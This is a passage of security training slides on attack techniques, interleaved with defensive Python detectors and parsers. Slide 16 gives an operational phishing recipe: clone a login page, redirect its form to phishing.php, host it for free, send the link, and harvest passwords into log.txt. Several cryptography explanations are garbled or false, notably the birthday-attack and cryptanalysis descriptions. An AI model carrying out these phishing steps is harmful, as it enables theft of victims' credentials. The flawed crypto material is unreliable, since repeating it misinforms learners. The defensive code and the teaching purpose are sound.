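    """'0' or '0px' -> 0; percentages or a missing attribute -> None."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)(px)?\s*", value)
    return int(m.group(1)) if m else None


def obfuscation_score(code: str) -> int:
    """Count independent obfuscation indicators in one script body."""
    score = sum(1 for call in OBFUSCATION_CALLS if call in code)
    if len(HEX_ESCAPE.findall(code)) >= 20:
        score += 1  # long runs of \xNN escapes hide the real source text
    return score


class DriveByScanner(HTMLParser):
    def __init__(self, script_threshold: int = 2):
        super().__init__()
        self.threshold = script_threshold
        self.findings: List[Tuple[str, str]] = []
        self._script: Optional[List[str]] = None  # collects text inside <script>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w, h = _pixels(a.get("width")), _pixels(a.get("height"))
            style = a.get("style") or ""
            if (w is not None and w <= 1) or (h is not None and h <= 1) \
                    or HIDDEN_STYLE.search(style):
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            code = "".join(self._script)
            self._script = None
            if obfuscation_score(code) >= self.threshold:
                self.findings.append(("obfuscated_script", code[:40]))


def scan_html(html: str) -> List[Tuple[str, str]]:
    scanner = DriveByScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples.  The "encoded" script is a harmless document.write
# spelled out as \xNN escapes, the shape the notes describe.
_ENCODED = "".join("\\x%02x" % b for b in b"document.write('<p>demo</p>')")
MALICIOUS_PAGE = f"""
<html><body>
<p>Latest news</p>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
<iframe src="http://bad.example/landing" width="0" height="0"></iframe>
<script>var p = "{_ENCODED}"; eval(p);</script>
</body></html>
"""
BENIGN_PAGE = """
<html><body>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
<script>console.log("page ready");</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(MALICIOUS_PAGE):
        print(kind, "->", detail)
```

This is a static heuristic and inherits the limitation the notes point out: polymorphic code that changes on every fetch defeats any fixed signature, so a scanner like this is useful for triage of captured pages, while catching the attack in the browser needs behavioural controls (script execution policy, blocking of the redirect chain) rather than pattern matching alone.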

Threat Techniques (7 of 66)

• Stage 2: Distribution
– The unsuspecting user is redirected to download an exploit kit

– Traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track

– Some TDS systems are legitimate

– But like any software, legitimate TDS solutions are prone to being hacked and exploited


Figure 2-10. Threat Techniques (7 of 66) DS011.0

Notes:
Stage 2: Distribution: Once a drive-by download has reached the browser, the unsuspecting user is
redirected to download an exploit kit. However, rather than sending users to known exploit kit hosting sites,
elaborate traffic distribution systems (TDS) create multiple redirections that are nearly impossible to track and
therefore black-list.
Some TDS systems are legitimate, for instance those used for advertising and referral networks. But like any
software, legitimate TDS solutions are prone to being hacked and exploited to drive traffic to malware hosting
sites instead of a benign destination.

Threat Techniques (8 of 66)

• Stage 3: Exploit
– An exploit pack is downloaded from the malware hosting site

– A large number of exploits are executed


Figure 2-11. Threat Techniques (8 of 66) DS011.0

Notes:
Stage 3: Exploit: The next phase of a modern web attack is the downloading of an exploit pack from the
malware hosting site. These kits execute a large number of exploits against vulnerabilities in web browsers
and associated plug-ins such as Java, PDF readers and media players.

Threat Techniques (9 of 66)

• Stage 4: Infect
– A malicious payload is downloaded to infect the system

– The payload is the actual malware or virus that will ultimately steal data or extort money from the user

– The hacker can choose from a wide range of different infectious payloads


Figure 2-12. Threat Techniques (9 of 66) DS011.0

Notes:
Stage 4: Infect: Once the attacker exploits an application vulnerability to gain some control over the
computer, the next step in the attack is to download a malicious payload to infect the system. The payload is
the actual malware or virus that will ultimately steal data or extort money from the user.
The hacker can choose from a wide range of different infectious payloads. Here are some of the most
common payloads used today.
Zbot (Zeus): Zeus is a Trojan horse that steals personal information by logging keystrokes and grabbing
frames in the browser. It initially targeted Windows machines, but variants have been found that infect Android
mobile devices as well.
Ransomware: Ransomware is a class of malware that restricts access to a user’s computer or files,
demanding payment to regain access. It primarily targets Windows, but there’s also a less harmful but equally
annoying Mac variant that recently started appearing.
PWS: PWS is a password-stealing and remote access Trojan that infects Windows computers.
Sinowal (Torpig): Torpig is a botnet infection which targets Microsoft Windows computers. It uses a rootkit to
steal credentials and allow remote access.
FakeAV: FakeAV (fake antivirus) installs a rogue security software client that appears to be a desktop
antivirus application. It scans and finds numerous fake viruses and extorts the user into paying to “clean up”
the viruses. It primarily plagued Windows systems, but is now being found on Macs as well.

Threat Techniques (10 of 66)

• Stage 5: Execute
– The malicious payload makes the criminal behind it some money

– This is done by selling credentials or by extorting the user into paying directly

– Examples: Ransomware and FakeAV


Figure 2-13. Threat Techniques (10 of 66) DS011.0

Notes:
Stage 5: Execute: In this final stage of the attack, the malicious payload has been downloaded and installed
on the victim’s system and now its job is to make the criminal behind it some money. It can do that in a
number of ways: by providing credentials, banking or credit card information that can be sold on the black
market, or by extorting the user into paying directly. Ransomware and FakeAV are both examples of malware
that extort victims into paying.

Threat Techniques (11 of 66)

• Network Based Threat Techniques


– Botnet
• A botnet is a collection of compromised computers, often referred to as “zombies”

• Botnet owners or “herders” are able to control the machines in their botnet by means of a covert
channel such as IRC (Internet Relay Chat)

• Commands are issued to perform malicious activities


Figure 2-14. Threat Techniques (11 of 66) DS011.0

Notes:
Botnet
A botnet is a collection of compromised computers, often referred to as “zombies”, infected with malware that
allows an attacker to control them. Botnet owners or “herders” are able to control the machines in their botnet
by means of a covert channel such as IRC (Internet Relay Chat), issuing commands to perform malicious
activities such as distributed denial-of-service (DDoS) attacks, the sending of spam mail and information
theft. The creation of a botnet comprises five steps, which are shown in the figure that follows.

Threat Techniques (12 of 66)


Figure 2-15. Threat Techniques (12 of 66) DS011.0

Notes:
The stages of botnet creation are illustrated in this slide. This process is explained in the slides which
follow.

Threat Techniques (13 of 66)

• Network Based Threat Techniques


– Botnet
• Botnet creation starts by using vulnerabilities which are already known on a victim’s system

• The victim’s machine is infected by the attacker through various methods of exploitation after it has
been scanned

• This phase is known as the initial infection phase. The mechanisms used by worms, viruses, etc. to
infect a system are also used in botnet attacks


Figure 2-16. Threat Techniques (13 of 66) DS011.0

Notes:
Botnet:
Botnet creation starts by using vulnerabilities which are already known on a victim’s system. The victim’s
machine is infected by the attacker through various methods of exploitation after it has been scanned. This
phase is known as the initial infection phase. The mechanisms used by worms, viruses, etc. to infect a system
are also used in botnet attacks. After the first phase, that is, initial infection, a script is executed on the
infected hosts.
The script is known as shellcode, and the second phase is known as secondary infection. The image of the
actual bot is fetched by the shellcode from a specific location via HTTP, peer-to-peer or FTP. The bot binary
then installs itself on the machine which has been targeted.
Once the bot program is installed, the victim’s computer runs the malicious code on its own. Every time the
computer is rebooted, the bot application starts itself automatically.
After its propagation, the new bot establishes a command and control channel in order to communicate with
the control server. Establishing this communication means joining the bot to the botnet; by doing so, the bot
is converted into a member of the bot master’s zombie army.

The bot now receives and executes the commands sent by the attacker via the command and control channel. Many malicious activities are carried out by the bots in this phase, where they are remotely controlled by the bot master; activities such as launching DDoS attacks and scanning for other machines are conducted by the bots.
The bots maintain their connection with the bot master continuously, by virtue of which the bot master can keep their binary code updated. The main purpose of updating the binary code is to evade detection techniques and to add new functionality that helps install further bots. In many cases, it is observed that the bots also move to another command and control channel.
Bot masters use Dynamic Domain Name System (DDNS) to keep their botnets portable and invisible. DDNS is a name resolution service that can accommodate regular changes and updates to the location of a server. It helps the bot master in cases where a command and control centre is disrupted by the authorities, as they can easily set up another command and control centre that has the same name but a different IP address.
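The DDNS behaviour described above has a visible side on the defender's resolver: a command and control name that keeps the same label but is re-pointed to new addresses with short TTLs. The following is an added example, not part of the course material; the log format, the names (update.example.test and friends) and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed resolver log (not a real capture). Format per line:
# "<ISO time> <client IP> <query name> A <answer IP> ttl=<seconds>"
SAMPLE_LOG = """\
2015-06-01T10:00:00 10.0.0.15 update.example.test A 203.0.113.10 ttl=60
2015-06-01T10:01:00 10.0.0.15 www.example.test A 192.0.2.80 ttl=3600
2015-06-01T10:05:00 10.0.0.15 update.example.test A 198.51.100.7 ttl=60
2015-06-01T10:12:00 10.0.0.22 update.example.test A 192.0.2.44 ttl=60
2015-06-01T10:20:00 10.0.0.15 update.example.test A 203.0.113.99 ttl=60
2015-06-01T11:30:00 10.0.0.31 www.example.test A 192.0.2.80 ttl=3600
2015-06-01T11:40:00 10.0.0.31 cdn.example.test A 192.0.2.5 ttl=300
2015-06-01T11:41:00 10.0.0.31 cdn.example.test A 192.0.2.6 ttl=300
"""


def parse_log(text):
    """Turn the constructed log lines into dicts with a real datetime and an int TTL."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, rtype, answer, ttl = line.split()
        if rtype != "A":
            continue
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "qname": qname.lower().rstrip("."),
            "ip": answer,
            "ttl": int(ttl.split("=", 1)[1]),
        })
    return records


def rotating_names(records, window=timedelta(hours=1), min_ips=3, max_ttl=300):
    """Return {qname: sorted distinct IPs} for every name that resolved to at least
    `min_ips` different addresses within any `window`-long span while advertising
    a TTL of at most `max_ttl` seconds. Short TTLs are what let the bot master
    re-point the name quickly; many distinct answers in a short span is the symptom.
    """
    by_name = defaultdict(list)
    for rec in records:
        by_name[rec["qname"]].append(rec)

    flagged = {}
    for name, recs in by_name.items():
        if any(r["ttl"] > max_ttl for r in recs):
            continue  # long TTLs: this name is not being re-pointed aggressively
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            # sliding window anchored at record i
            ips = {r["ip"] for r in recs[i:] if r["ts"] - first["ts"] <= window}
            if len(ips) >= min_ips:
                flagged[name] = sorted({r["ip"] for r in recs})
                break
    return flagged


if __name__ == "__main__":
    for name, ips in rotating_names(parse_log(SAMPLE_LOG)).items():
        print(f"{name}: {len(ips)} distinct addresses -> {', '.join(ips)}")
```

Legitimate CDNs and load balancers also rotate answers, so this is a triage signal to correlate with the other botnet indicators on this page, not a verdict on its own.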


Threat Techniques (14 of 66)

• Network Based Threat Techniques

– Phishing
• This threat is a form of social engineering

• There are 3 roles to be played by the phisher (the attacker) in a phishing attack

– Send out a large number of deceptive emails

– Set up false websites

– Use the confidential data gained


Figure 2-17. Threat Techniques (14 of 66) DS011.0

Notes:
Phishing
This threat is a form of social engineering. In this attack, the attacker (also known as the phisher) lures the victim by presenting the identity of a trustworthy public platform to them and then harvests all the critical credentials of the victim. There are 3 roles to be played by the phisher in a phishing attack. The first is to send out a large number of deceptive emails through botnets or some other medium. The second involves the phisher setting up false websites, which are hosted on a compromised system; such a website prompts the victim to enter their confidential and sensitive information. The third and last role is to use the confidential information that the user has provided to achieve a pay-out.


Threat Techniques (15 of 66)


Figure 2-18. Threat Techniques (15 of 66) DS011.0

Notes:
The steps of phishing are shown in this slide and are explained in the following slides.


Threat Technique (16 of 66)

• Network-based threat techniques

– Phishing
• Step 1: Fake login page

• Step 2: Creating phishing.php file

• Step 3: Creating index.html page

• Step 4: Word action

• Step 5: Replace the link

• Step 6: Create account

• Step 7: Upload files

• Step 8: Send the link to the victim


Figure 2-19. Threat Technique (16 of 66) DS011.0

Notes:
Step 1: Fake login page: First of all, a fake login page of the web account one wants to hack is required.
Step 2: Creating phishing.php file: A PHP script is required that collects all the form data. The following code is copied into a text editor (notepad) and saved as phishing.php.
Step 3: Creating index.html page: Go to xxxxxxx.com (without logging in), right-click anywhere in the browser and choose view page source. Open the source code in a text editor (notepad).
Step 4: Word action: A new window pops up in which all the HTML code can be seen. Here one needs to look for the word action. By pressing CTRL+F and searching for action, a link like action https://www.xxxxxxx.com/login.php?login_attempt=1 will be found.
Step 5: Replace the link: The link is then replaced with phishing.php, as in action "phishing.php", and the page is saved as index.html (not index.html.txt).
Step 6: Create account: An account on a free hosting website like YYY.com is created.

Step 7: Upload files: Now "phishing.php" and "index.html" are uploaded to the folder that was created inside the fake website. Once the upload is done, the link to the phishing page can be www.yourname.YYY.com/xxxxxxx/index.htm, sent with any message such as “change your FaceBook password”. If anybody logs in on the fake page, their username and password are stored in the log.txt file of the free hosting account.
Step 8: Send the link to the victim: Now the link to this fake site is sent to the victim; as soon as they log in, a file named log.txt with the victim’s password is stored in the free hosting account, and the fake login page redirects to the real login page, which asks the victim to verify their password.
Thus, the process of phishing is concluded.
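The edit in step 5 leaves a tell-tale that a defender (or a security-aware browser extension) can check for: a login form whose action resolves to a host other than the real site, or to plain HTTP. The following audit is an added example, not course material; the domains example.test and hosting.test are placeholders standing in for the xxxxxxx.com and YYY.com of the text.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> and note whether it holds a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(html, page_url, trusted_host):
    """For each form that carries a password field, resolve its action against the page
    URL and list why it should not be trusted with credentials (empty list = clean)."""
    parser = _FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        # A relative action such as "phishing.php" resolves to the site hosting the copy.
        target = urlsplit(urljoin(page_url, form["action"]))
        problems = []
        if target.scheme != "https":
            problems.append(f"credentials would be sent over {target.scheme}")
        if target.hostname != trusted_host.lower():
            problems.append(f"form posts to {target.hostname}, not {trusted_host}")
        findings.append({"action": target.geturl(), "problems": problems})
    return findings


# Constructed markup standing in for the genuine login page (placeholder domain).
GENUINE_HTML = """
<form method="post" action="https://www.example.test/login.php?login_attempt=1">
  <input type="text" name="email"><input type="password" name="pass">
</form>
"""

# The same markup after step 5 above: only the action attribute differs.
CLONED_HTML = GENUINE_HTML.replace(
    'action="https://www.example.test/login.php?login_attempt=1"', 'action="phishing.php"')


if __name__ == "__main__":
    for label, html, url in [
        ("genuine", GENUINE_HTML, "https://www.example.test/"),
        ("cloned", CLONED_HTML, "http://yourname.hosting.test/clone/index.html"),
    ]:
        for finding in audit_login_forms(html, url, "www.example.test"):
            print(label, finding["action"], finding["problems"] or "OK")
```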


Threat Techniques (17 of 66)

• Network Based Threat Techniques


– Sniffing
• Sniffing includes capturing, decoding, interpreting and inspecting data

• It falls in the category of passive attacks

• A TCP/IP packet carries various vital pieces of information that two network interfaces require in order to communicate with one another

• It contains fields such as destination and source IP address, port number, protocol type and sequence numbers


Figure 2-20. Threat Techniques (17 of 66) DS011.0

Notes:
Sniffing
Sniffing includes capturing, decoding, interpreting and inspecting the data present inside a network packet on a TCP/IP network. Its main purpose is to steal information such as network details, card numbers, user IDs, etc. It falls in the category of passive attacks, as the attackers remain silent or invisible on the network on which the attack is carried out. Sniffing is a very dangerous type of cyber-attack because it is very difficult to detect.
A TCP/IP packet carries various vital pieces of information that two network interfaces require in order to communicate with one another. It contains fields such as destination and source IP address, port number, protocol type and sequence numbers. All these fields are vital for the network layers to function, and especially for layer 7, which makes use of the data received. The TCP/IP protocol ensures that the packet is constructed, mounted on the Ethernet frame and consistently delivered from the sender to the receiver across networks. Therefore, the network layers above have to make sure that the integrity of the information contained in the packets is maintained.
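To make the header fields named above concrete, here is an added example (not from the course) that builds one constructed IPv4+TCP datagram and parses back exactly those fields: addresses, ports, protocol number, sequence number and flags. This is the same decoding an intrusion detection sensor performs on captured traffic; the addresses are documentation ranges and the checksums are left at zero.

```python
import socket
import struct

IP_HDR = "!BBHHHBBH4s4s"   # ver/IHL, TOS, total length, id, flags/frag, TTL, proto, checksum, src, dst
TCP_HDR = "!HHIIBBHHH"     # sport, dport, seq, ack, data offset, flags, window, checksum, urgent
TCP_FLAG_BITS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def build_sample_packet():
    """Constructed IPv4 + TCP headers with no payload (checksums zero); used only to exercise the parser."""
    tcp = struct.pack(TCP_HDR, 40512, 443, 0x1A2B3C4D, 0x0000BEEF, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack(IP_HDR, 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6,
                     0, socket.inet_aton("192.0.2.10"), socket.inet_aton("198.51.100.20"))
    return ip + tcp


def parse_packet(data):
    """Extract the fields the text names from a raw IPv4 datagram; TCP fields only when protocol is 6."""
    if len(data) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _ident, _ff, ttl, proto, _csum, src, dst = struct.unpack(IP_HDR, data[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (ver_ihl & 0x0F) * 4          # header length in bytes; 20 unless IP options are present
    info = {"src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst),
            "ttl": ttl, "protocol": proto, "total_length": total_len}
    if proto == 6:
        if len(data) < ihl + 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off, flags, win, _tcsum, _urg = struct.unpack(TCP_HDR, data[ihl:ihl + 20])
        data_off = (off >> 4) * 4       # TCP header length in bytes
        info.update({
            "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack, "window": win,
            "flags": [name for bit, name in TCP_FLAG_BITS if flags & bit],
            "payload_len": total_len - ihl - data_off,
        })
    return info


if __name__ == "__main__":
    for key, value in parse_packet(build_sample_packet()).items():
        print(f"{key:>12}: {value}")
```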


Threat Techniques (18 of 66)

• Network Based Threat Techniques


– Sniffing
• Sniffing attacks depend on which OSI layer is targeted

• It must be remembered that sniffing attacks can be carried out at every level, whether Layer 1 or Layer 7

• Network traffic is captured by a person who is hooked up to the internal LAN


Figure 2-21. Threat Techniques (18 of 66) DS011.0

Notes:
Sniffing
To understand why hackers carry out a sniffing attack, it is necessary to understand what type of information is available at each OSI layer. The figure below shows the information available at each OSI layer that a hacker can steal by successfully carrying out a sniffing attack.
It must be remembered that sniffing attacks can be carried out at every level, whether Layer 1 or Layer 7. Network traffic is captured by a person who is hooked up to the internal LAN; this person has physical connectivity to the LAN. A hacker outside the target network intercepts packets by using the technique of spoofing.
The latest form of packet sniffing has been made easier by the use of wireless networks, which can be used to penetrate a network and obtain information. Hackers use packet sniffing and capture software to sniff information, regardless of where they are located. The actual purpose of modern packet sniffers is to troubleshoot problems in networks, but they are also used by hackers to sniff information.


Threat Techniques (19 of 66)


Figure 2-22. Threat Techniques (19 of 66) DS011.0

Notes:
The diagram shows the different OSI layers and the type of data present at each layer.


Threat Techniques (20 of 66)


Figure 2-23. Threat Techniques (20 of 66) DS011.0

Notes:
The diagram shows the ways to carry out the sniffing processes. A person (who may be an employee of the
firm) who is already hooked up to the internal LAN can run tools to directly capture network traffic. Using
spoofing techniques, a hacker outside the target network can intercept packets at the firewall level and steal
the information. In the latest form of packet sniffing, wide usage of wireless networks has made it easy to sit
near the network and penetrate it to get information.


Threat Techniques (21 of 66)

• Network Based Threat Techniques


– Sniffing
• Types of Sniffing
– A LAN sniff

– A protocol sniff

– An ARP sniff


Figure 2-24. Threat Techniques (21 of 66) DS011.0

Notes:
The section below discusses the ways in which sniffing can be carried out.
A LAN sniff: A sniffer deployed on an internal LAN can scan the entire IP range and provide further details such as live hosts, open ports, etc. Once a list of open ports has been gathered, a port-specific vulnerability can be identified and an attack carried out.
A protocol sniff: This method involves sniffing the data associated with the network protocols in use. Based on the captured data, a protocol list is made and then segregated in order to create a sniffer for every breach. For example: if ICMP is not seen in the capture of a network sniff, it is assumed that the ICMP protocol is blocked. If ICMP traffic is seen, a UDP sniffer captures and then deciphers application details of PPP, Telnet, DNS, etc.
An ARP sniff: In this method the hacker captures a lot of data and creates a map of IP addresses and the MAC addresses associated with them. Attacks such as packet spoofing, ARP poisoning, etc. can then be built using this map. It can also be used to dig into vulnerabilities associated with the router.


Network Based Threat Techniques (22 of 66)

• Network Based Threat Techniques


– Sniffing
• Types of Sniffing
– TCP session stealing

– Application-level sniffing

– Web password sniffing


Figure 2-25. Network Based Threat Techniques (22 of 66) DS011.0

Notes:
TCP session stealing: In this method, the traffic between the source and the destination IP address is captured by a network interface working in promiscuous mode. It is the most basic form of sniffing attack. Hackers are interested in details such as service types, port numbers, the data present and the TCP sequence numbers. After capturing sufficient packets, hackers can fabricate TCP sessions. The fabricated session is used to fool both the source and the destination and to take over the session by acting as a man in the middle.
Application-level sniffing: Very intricate application details can be found out from data packets that have been captured and sniffed. These details can be used to steal information or to create attacks. For example: OS fingerprinting, revealing the data on a specific TCP port, SQL query analysis, etc. can be performed by parsing the captured file. An application-specific attack can be planned by creating a short list of the applications running on the server.
Web password sniffing: To steal a user ID and the password associated with it, HTTP sessions are parsed and stolen in this type of attack. The attacks are carried out through internal websites that use standard encryption which is less secure. This is done in order to dodge the SSL (Secure Sockets Layer) protection that has been incorporated to secure HTTP sessions. Base64 or Base128 packets are easy to capture; after they have been captured, a deciphering agent is run on them in order to crack the password.


Threat Techniques (23 of 66)

• Network Based threat techniques


– Password Attack
• Traditional way of finding out the password of a computer system

• Unlimited opportunities have been created for intruders

• These limitless openings have been created by the internet

• The motivation and goal of one password hacker may differ from another’s, but the main motive of all of them is to gain control over a particular computer network or system


Figure 2-26. Threat Techniques (23 of 66) DS011.0

Notes:
Password attack
These attacks are the traditional way of finding out the password of a computer system and gaining access to all the data in it. The internet has created unlimited opportunities for intruders to tinker with websites, steal secrets, abscond with financial data, etc. The motivation and goal of one password hacker may differ from another’s, but the main motive of all of them is to gain control over a particular computer network or system. Therefore, some of the steps taken by any password hacker are the same: an intruder can build up system privileges after gaining interactive entry or employing other techniques. Thus, the first step in cracking a network is to find a password. Below are some common methods used to crack passwords.


Threat Techniques (24 of 66)

• Network Based threat techniques


– Brute-Force Attack
• A brute-force attack can be used to crack any password

– Rainbow Attack
• A pre-computed list that has the hashes for every possible character combination

– Dictionary Attack
• Common words are used in this type of attack to identify the password of a system


Figure 2-27. Threat Techniques (24 of 66) DS011.0

Notes:
Brute-Force Attack: A brute-force attack can be used to crack any password. Every possible combination of letters, numbers or other special characters is tried in this attack. The complexity of the password determines how long a brute-force attack takes; the computer’s speed is also a determining factor in the time taken to crack the password.
Rainbow Table: A pre-computed list that has the hashes for every possible character combination is called a rainbow table. It is almost the same as a dictionary attack, the only difference being that in this attack, hashed characters are used as the passwords.
For example: ‘hello’ in MD5 is 5d41402abc4b2a76b9719d911017c592 and the zero-length string ("") is d41d8cd98f00b204e9800998ecf8427e.
Dictionary Attack or Guessing: Common words are used in this type of attack to identify the password of a system. These common words may include the names of loved ones, birth dates, phone numbers, etc. A dictionary is needed for carrying out a dictionary attack. This dictionary must be flexible enough that the hacker can add custom words and conduct a forensic analysis. A forensic analysis is a process in which text documents are scanned by software and all the words in those documents are added to the dictionary. Sometimes the passwords set by users are so simple that they can easily be guessed by an intruder.
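Why the MD5 values quoted above are a liability, and what removes the pre-computation advantage: an added example (not course material) that looks the two quoted digests up in a tiny constructed table, then stores the same password with a per-user random salt and an iterated hash. PBKDF2-HMAC-SHA256 is a swapped-in modern technique, not something the text prescribes.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a rainbow table: unsalted MD5 -> candidate password.
# A real table holds billions of rows; the two digests quoted in the text are among these.
PRECOMPUTED_MD5 = {hashlib.md5(w.encode()).hexdigest(): w
                   for w in ["", "hello", "password", "letmein", "123456"]}


def lookup_unsalted_md5(md5_hex):
    """An unsalted MD5 is just a dictionary key: one lookup recovers the password, or None."""
    return PRECOMPUTED_MD5.get(md5_hex.lower())


def hash_password(password, salt=None, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256 (the defence; not the text's plain MD5).
    Returns (salt, derived_key). A fresh random salt per user means a table built in
    advance would have to be rebuilt for every salt, so pre-computation buys nothing,
    and the iteration count makes each guess expensive even without a table."""
    if salt is None:
        salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, key


def verify_password(password, salt, expected_key, iterations=200_000):
    """Recompute with the stored salt and compare in constant time."""
    _, key = hash_password(password, salt, iterations)
    return hmac.compare_digest(key, expected_key)


if __name__ == "__main__":
    print("unsalted md5 of 'hello' ->", lookup_unsalted_md5("5d41402abc4b2a76b9719d911017c592"))
    salt_a, key_a = hash_password("hello")
    salt_b, key_b = hash_password("hello")
    print("same password, different salts, same digest?", key_a == key_b)
    print("verify 'hello' for user A:", verify_password("hello", salt_a, key_a))
```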


Network Based Threat Techniques (25 of 66)

• Network Based threat techniques


– Intercepting the Transmission
• In this type of attack, the attacker establishes a successful man-in-the-middle connection into the network

• A digital certificate is supposed to be sent to the browser by the server as part of the SSL handshake process

• By capturing the certificate, the attacker grabs details such as cipher strength, domain name, expiration date, etc.

• From this point onwards, each request made by the browser is intercepted by the attacker


Figure 2-28. Network Based Threat Techniques (25 of 66) DS011.0

Notes:
Intercepting the transmission
In this type of attack, the attacker establishes a successful man-in-the-middle connection into the network. After creating this connection, the attacker silently watches the HTTPS traffic and waits for the targeted website to respond to the HTTPS request made by the browser. A digital certificate is supposed to be sent to the browser by the server as part of the SSL handshake process. By capturing this certificate, the attacker grabs details such as cipher strength, domain name, expiration date, etc. The attacker then creates a certificate of their own, known as a self-signed certificate, which contains the same information as the captured certificate. From this point onwards, each request made by the browser is intercepted by the attacker. The attacker becomes a real man-in-the-middle and responds to every request made by the browser by sending the fake certificate. The web browser pops up a warning, which is the normal response when this situation arises, but in most cases the person browsing the website ignores the warning and thereby helps make the attack successful. The attacker establishes a separate HTTPS connection to the server and completes the request, and the result of the response is fed back to the web browser over the connection that has already been established. Thus the SSL traffic is completely under the attacker’s control, which helps the attacker steal all the personal information. This attack is less likely to happen, as it involves a real-time intrusion into the network, but if it does take place it can cause a serious loss of data. It is very difficult to detect this kind of attack, as the attacker does not break the request and response chain.


Threat Techniques (26 of 66)

• Cryptographic Threat Techniques


– The need for encryption is two-fold

– There are many threat techniques by which a cryptographic system can be broken.

– These techniques are described in the next slides


Figure 2-29. Threat Techniques (26 of 66) DS011.0

Notes:
Cryptographic Threat Techniques
The need for encryption is twofold. Firstly, encryption makes it difficult to read and use any sensitive information that an app stores on a device. Secondly, encryption adds an additional layer of security to sensitive information that is exchanged between apps and remote servers. There are many threat techniques by which a cryptographic system can be broken. These techniques are described in the slides that follow.


Threat Techniques (27 of 66)

• Cryptographic Threat Techniques


– Cryptanalysis
• Combination of computing power and sophisticated mathematical formulas can defeat any
algorithm

• There are two basic goals of a cryptanalytic attack


– To discover the plaintext

– To discover the cipher text


Figure 2-30. Threat Techniques (27 of 66) DS011.0

Notes:
Cryptanalysis
If computing power and sophisticated mathematical formulas are combined, most encryption algorithms can be defeated easily. Thus many messages can be decrypted without even knowing the key. A skilled cryptanalyst can even decipher encrypted text without knowing the algorithm used to encrypt the data. There are two basic goals of a cryptanalytic attack: the first is to discover the plaintext from the ciphertext, and the second is to discover the ciphertext from the plaintext and then acquire the encryption key. Below are the attacks commonly used when the algorithm used for encryption is known:


Threat Techniques (28 of 66)

• Cryptographic Threat Techniques


– Cryptanalysis
• Known Plaintext Attack

• Chosen Plaintext Attack

• Differential Cryptanalysis


Figure 2-31. Threat Techniques (28 of 66) DS011.0

Notes:
Known Plaintext Attack: In this type of attack, an attacker possesses a block of plaintext and the block of ciphertext corresponding to it. The main aim is to discover the cryptographic key and also the encryption algorithm from the known plaintext. Once the encryption algorithm is known, it can be used for message decryption.
Chosen Plaintext Attack: In this type of attack, a cryptanalyst has some chosen data blocks encrypted without knowing which block is being encrypted. The encrypted data blocks can then be used to create a result that is analyzed afterwards.
Differential Cryptanalysis: In this type of attack, many texts are encrypted simultaneously. Only nearly identical texts are chosen to be encrypted. Once encryption is done, the results are compared with each other, which gives a fair pattern of the encryption key in use.


Threat Techniques (29 of 66)

• Cryptographic Threat Techniques


– Cryptanalysis
• Differential Fault Analysis

• Differential Power Analysis

• Differential Timing Analysis


Figure 2-32. Threat Techniques (29 of 66) DS011.0

Notes:
Differential Fault Analysis: This attack only works on hardware cryptographic systems. While such a system is operating, it is subjected to various environmental factors such as heat, radiation, etc., which coax the system into making mistakes during the encryption or decryption operation. The internal state of the device, that is the algorithm, can be discovered by analyzing the faults that have occurred in the system.
Differential Power Analysis: This type of attack is normally a hardware cryptographic attack that is particularly carried out on smart cards. The structure of the secret key held in a smart card can be discovered by observing the power consumed by the smart card while encrypting a chosen data block. It is thus possible to determine the key and carry out this attack.
Differential Timing Analysis: This attack is very similar to differential power analysis, except that the attacker carefully monitors the time the smart card takes to perform the requested operation of encrypting the data block.


Threat Techniques (30 of 66)

• Cryptographic Threat Techniques


– Birthday Attack
• Based on a mathematical theory known as the ‘birthday problem paradox’

• This theory states that if a set of people is selected randomly, some pair of the people will have their birthdays on the same day

• The hash or checksum is calculated at both ends of the data transmission and hence the integrity of the data is maintained

• In a birthday attack, various attackers come together and capture data chunks individually


Figure 2-33. Threat Techniques (30 of 66) DS011.0

Notes:
Birthday Attack
The existence of this type of attack is based on a mathematical theory known as the ‘birthday problem paradox’. This theory states that if a set of people is selected randomly, some pair of the people will have their birthdays on the same day. The theory also depends on the number of people chosen: a greater number of people ensures that the theory is more accurate. This attack targets the hash or checksum that is used to establish data integrity in cryptography. The hash or checksum is calculated at both ends of the data transmission and hence the integrity of the data is maintained. In a birthday attack, various attackers come together and capture data chunks individually.
